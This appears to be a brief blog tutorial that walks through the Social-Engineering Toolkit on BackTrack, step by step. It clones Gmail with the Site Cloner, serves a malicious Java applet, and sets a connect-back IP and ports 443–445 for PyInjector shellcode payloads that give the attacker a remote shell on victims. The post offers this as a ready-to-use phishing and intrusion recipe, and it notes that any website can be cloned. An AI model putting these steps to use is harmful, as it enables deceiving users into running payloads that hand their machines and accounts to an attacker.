Open your backtrack terminal & Type cd /pentest/exploits/set
Now Open Social Engineering Toolkit (SET). /set
Now we will choose option 5, “Update the Social-Engineering Toolkit”
Now we will choose option 1, “Social-Engineering Attacks”
Now we will choose option 2, “Website Attack Vectors”
Now we will choose the option 1 the Java Applet Attack Method
Now we will choose option 2, “Site Cloner”
Are you using NAT/PORT Forwarding: no
Enter the IP address to connect back on: 192.168.1.3 (IP address of Your PC)
Enter the URL to clone: http://www.gmail.com (but you can use any website to run the Java Applet)
Now choose 16 “Multi PyInjector Shellcode Injection”,
Port of the attacker computer. In this example I use port 443
Select the payload you want to deliver via shellcodeexec press enter here
Now again select Port of the attacker computer. In this example I use port 444 and 445
Select the payload you want to deliver via shellcodeexec press enter here






0 nhận xét:
Đăng nhận xét